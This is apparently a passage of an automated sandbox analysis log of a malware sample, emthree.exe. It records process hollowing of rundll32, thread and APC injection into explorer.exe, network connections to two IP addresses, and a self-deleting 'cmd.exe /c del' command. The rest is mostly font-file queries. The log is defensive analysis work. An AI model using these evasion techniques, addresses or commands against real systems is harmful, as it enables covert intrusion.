          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ECC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ECC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F23540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F53D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EC7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F78D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F2A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F6E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EAAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F78ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F5FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F3FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ECAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ECAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ECAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ECAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\rundll32.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\emthree.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 23.27.109.19 80
          Source: C:\Windows\explorer.exeNetwork Connect: 184.154.50.243 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\emthree.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\emthree.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\emthree.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\emthree.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\emthree.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\emthree.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: AC0000
          Source: C:\Users\user\Desktop\emthree.exeProcess created: C:\Users\user\Desktop\emthree.exe {path}
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\emthree.exe'
          Source: explorer.exe, 00000002.00000002.503348798.0000000005EA0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.242251394.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.242251394.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000002.488072734.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000000.242251394.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000000.242251394.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Users\user\Desktop\emthree.exe VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
